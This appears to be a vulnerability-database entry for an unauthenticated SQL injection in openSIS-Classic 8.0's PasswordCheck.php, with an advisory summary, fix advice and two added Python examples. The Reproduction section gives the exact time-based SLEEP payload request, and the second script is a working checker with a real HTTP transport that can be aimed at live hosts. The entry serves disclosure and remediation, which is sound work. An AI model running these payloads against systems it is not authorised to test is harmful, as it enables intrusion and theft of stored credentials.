CVE-2021-40543
Description
Opensis-Classic Version 8.0 is affected by a SQL injection vulnerability due to a lack of sanitization of input data at two parameters $_GET['usrid'] and $_GET['prof_id'] in the PasswordCheck.php file.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
OpenSIS-Classic 8.0 is vulnerable to unauthenticated SQL injection via the `usrid` and `prof_id` parameters in PasswordCheck.php, allowing database information disclosure.
Vulnerability
OpenSIS-Classic Version 8.0 contains a SQL injection vulnerability in the PasswordCheck.php file. The application fails to sanitize user-supplied input passed via the $_GET['usrid'] and $_GET['prof_id'] parameters, allowing an attacker to inject arbitrary SQL code into the query. The vulnerable code path is reachable without authentication. [1]
Exploitation
An unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP GET request to /PasswordCheck.php with a malicious payload in the usrid or prof_id parameter. The advisory confirms the injection with a time-based blind technique, using SLEEP() to introduce a measurable delay in the response. Tools such as sqlmap can then automate extraction of database content. No special privileges or user interaction are required. [1]
Impact
Successful exploitation allows an attacker to execute arbitrary SQL as the application's database user, leading to disclosure of the information stored in the database, including user credentials and other sensitive data. Modifying or deleting data may also be possible, depending on the database account's permissions and on whether the query interface permits stacked statements. The severity is high because no authentication is required. [1]
Mitigation
The issue was reported via an advisory on the openSIS-Classic GitHub repository. The recommended fix is to sanitize the parameters with the sqlSecurityFilter() function from functions/SqlSecurityFnc.php: include the file with include("functions/SqlSecurityFnc.php");, then assign $usrid = sqlSecurityFilter($_GET['usrid']); and cast $_GET['prof_id'] with intval(). The reference does not name a patched release, so users must apply the suggested code changes themselves. [1] Note that string filtering is a weaker control than a parameterised query; where the surrounding code allows, binding both values as query parameters removes the injection regardless of which patterns the filter rejects.
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Opensis-Classic/Opensis-Classic
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input sanitization on `$_GET['usrid']` and `$_GET['prof_id']` in PasswordCheck.php allows unauthenticated SQL injection."
Attack vector
An unauthenticated attacker can inject SQL code by appending malicious payloads to the `usrid` and `prof_id` query string parameters when accessing `PasswordCheck.php` [ref_id=1]. The advisory demonstrates a time-based blind SQL injection using `SLEEP(5)` in the `prof_id` parameter, which does not require any prior authentication [ref_id=1]. The attacker only needs network access to the web server hosting openSIS-Classic and can use tools like sqlmap to extract the entire database contents [ref_id=1].
Affected code
The vulnerability resides in `PasswordCheck.php`, where the `$_GET['usrid']` and `$_GET['prof_id']` parameters are used directly in SQL queries without sanitization [ref_id=1]. The advisory notes that the fix involves calling `sqlSecurityFilter()` from `functions/SqlSecurityFnc.php` on `$_GET['usrid']` and using `intval()` on `$_GET['prof_id']` [ref_id=1].
What the fix does
The advisory recommends applying the `sqlSecurityFilter()` function (from `functions/SqlSecurityFnc.php`) to the `$_GET['usrid']` input and wrapping `$_GET['prof_id']` in `intval()` [ref_id=1]. The integer cast guarantees `prof_id` reaches the query as a number, so no SQL text can survive in it; `sqlSecurityFilter()` is a string filter rather than a parameterised query, so the protection on `usrid` is only as strong as the patterns it rejects. No official patch commit is provided in the bundle; the fix is described only in the advisory's solution section [ref_id=1].
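As an added illustration (not code from openSIS-Classic, whose real table and column names the advisory does not show), the following Python models the flawed query construction in PasswordCheck.php beside the hardened form, using an in-memory SQLite table with constructed rows. SQLite has no SLEEP(), so the vulnerable path is exercised with boolean payloads rather than the advisory's time-based one; `php_intval` imitates PHP's intval() leading-digit parsing, which is why the advisory's own prof_id payload collapses to the integer 1. The hardened lookup binds both values as query parameters, which is a stronger fix than the string filter the advisory suggests for usrid.

```python
import re
import sqlite3

# Constructed schema and rows for the demonstration. The real openSIS-Classic
# table and column names are not given in the advisory; these are assumptions.
SCHEMA = """
CREATE TABLE login_authentication (
    user_id    TEXT,
    profile_id INTEGER,
    password   TEXT
);
"""
ROWS = [
    ("1", 1, "hash-of-admin-password"),
    ("2", 2, "hash-of-teacher-password"),
    ("3", 3, "hash-of-student-password"),
]

# prof_id payload from the advisory, kept verbatim so the integer cast can be shown on it.
ADVISORY_PROF_ID = "1' AND (SELECT 9714 FROM (SELECT(SLEEP(5)))vGYX)-- -"


def fresh_db():
    """Return a new in-memory database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO login_authentication VALUES (?, ?, ?)", ROWS)
    return conn


def php_intval(value):
    """Imitate PHP intval() on a string: optional sign and leading digits, else 0."""
    match = re.match(r"\s*([+-]?\d+)", value)
    return int(match.group(1)) if match else 0


def vulnerable_lookup(conn, usrid, prof_id):
    """Model of the flaw: both GET values are spliced straight into the SQL text."""
    sql = (
        "SELECT user_id, password FROM login_authentication "
        f"WHERE user_id='{usrid}' AND profile_id='{prof_id}'"
    )
    return conn.execute(sql).fetchall()


def hardened_lookup(conn, usrid, prof_id):
    """Hardened form: prof_id is cast to an integer and both values are bound."""
    sql = (
        "SELECT user_id, password FROM login_authentication "
        "WHERE user_id=? AND profile_id=?"
    )
    return conn.execute(sql, (usrid, php_intval(prof_id))).fetchall()


def demo():
    """Row counts for a benign request and two injection payloads on both code paths."""
    conn = fresh_db()
    tautology = "1' OR '1'='1"   # closes the quote and appends an always-true clause
    comment_out = "x' OR 1=1--"  # comments out the remainder of the WHERE clause
    return {
        "vuln_benign": len(vulnerable_lookup(conn, "1", "1")),
        "vuln_prof_id_tautology": len(vulnerable_lookup(conn, "1", tautology)),
        "vuln_usrid_comment": len(vulnerable_lookup(conn, comment_out, "1")),
        "safe_prof_id_tautology": len(hardened_lookup(conn, "1", tautology)),
        "safe_usrid_comment": len(hardened_lookup(conn, comment_out, "1")),
        "safe_advisory_payload": len(hardened_lookup(conn, "1", ADVISORY_PROF_ID)),
        "advisory_payload_as_int": php_intval(ADVISORY_PROF_ID),
    }


if __name__ == "__main__":
    for name, count in demo().items():
        print(f"{name}: {count}")
```

Running the block shows the vulnerable lookup returning every row (all three password hashes) for either payload, while the hardened lookup returns one row for a legitimate user and nothing for the usrid payload. The advisory's prof_id payload becomes the integer 1 under the cast, which is exactly why intval() is sufficient for that parameter.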
Preconditions
- No authentication required
- Network access to the openSIS-Classic web server
- The PasswordCheck.php endpoint must be reachable
Reproduction
Access `PasswordCheck.php` with crafted parameters, e.g.: `GET /PasswordCheck.php?password=P@a&usrid=1&prof_id=1%27%20AND%20(SELECT%209714%20FROM%20(SELECT(SLEEP(5)))vGYX)--%20-` [ref_id=1]. The advisory reports that the server responds with a 200 OK and a body of `0` [ref_id=1]. Because a benign request can produce the same response, it is the roughly five-second delay introduced by `SLEEP(5)` that confirms the injected SQL executed; compare the response time against an otherwise identical request with `prof_id=1`.
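An added example, not part of the advisory or the project: a small Python checker that builds the advisory's request with a configurable SLEEP() delay and compares the probe's response time against a baseline request, which is the signal that actually confirms a time-based blind injection. Constructed fake transports stand in for a vulnerable and a patched server so the logic runs offline; `http_fetch` is the real transport for use only against a host you are authorised to test. The base URL, the timing tolerance and the fake servers are assumptions.

```python
import re
import time
import urllib.parse
import urllib.request

PARAMS = {"password": "P@a", "usrid": "1"}  # fixed parameters from the advisory's request


def build_baseline_url(base_url):
    """Benign request used to measure normal response time."""
    query = urllib.parse.urlencode({**PARAMS, "prof_id": "1"})
    return f"{base_url.rstrip('/')}/PasswordCheck.php?{query}"


def build_probe_url(base_url, delay):
    """Advisory payload with SLEEP(5) generalised to SLEEP(delay)."""
    payload = f"1' AND (SELECT 9714 FROM (SELECT(SLEEP({delay})))vGYX)-- -"
    query = urllib.parse.urlencode({**PARAMS, "prof_id": payload})
    return f"{base_url.rstrip('/')}/PasswordCheck.php?{query}"


def http_fetch(url, timeout=60):
    """Real transport: (status, body) for a GET. Use only against systems you may test."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.status, resp.read().decode("utf-8", errors="replace")


def timed(fetch, url):
    """Run fetch(url) and return (status, body, seconds elapsed)."""
    start = time.monotonic()
    status, body = fetch(url)
    return status, body, time.monotonic() - start


def check_time_based(base_url, delay=5, fetch=http_fetch, rounds=2, tolerance=0.8):
    """True when every probe takes at least tolerance*delay longer than the baseline.

    The advisory shows a 200 OK with body '0', but a benign request returns the
    same thing; the delay is the only reliable signal, so it is measured more
    than once to reduce the chance of a network hiccup being misread as success.
    """
    _, _, baseline = timed(fetch, build_baseline_url(base_url))
    for _ in range(rounds):
        _, _, elapsed = timed(fetch, build_probe_url(base_url, delay))
        if elapsed - baseline < tolerance * delay:
            return False
    return True


# Constructed stand-ins for a server (assumptions), so the checker runs offline.
def _prof_id_from(url):
    query = urllib.parse.urlsplit(url).query
    return urllib.parse.parse_qs(query).get("prof_id", [""])[0]


def fake_vulnerable_fetch(url):
    """Behaves like unpatched 8.0: a SLEEP(n) inside prof_id really stalls the reply."""
    match = re.search(r"SLEEP\(([\d.]+)\)", _prof_id_from(url))
    if match:
        time.sleep(float(match.group(1)))
    return 200, "0"


def fake_patched_fetch(url):
    """Behaves like a fixed build: intval() turns the payload into 1, so no delay."""
    return 200, "0"


if __name__ == "__main__":
    print("vulnerable stand-in:", check_time_based("http://sis.example", 0.3, fake_vulnerable_fetch))
    print("patched stand-in:   ", check_time_based("http://sis.example", 0.3, fake_patched_fetch))
```

Against a real host, call `check_time_based("https://host", delay=5)` with the default transport; the short 0.3 second delay in the stand-ins is only to keep the offline run quick. A true result from two consecutive probes is strong evidence, but the response body alone never is.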
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1. https://github.com/OS4ED/openSIS-Classic/issues/191 (MISC)
News mentions
No linked articles in our index yet.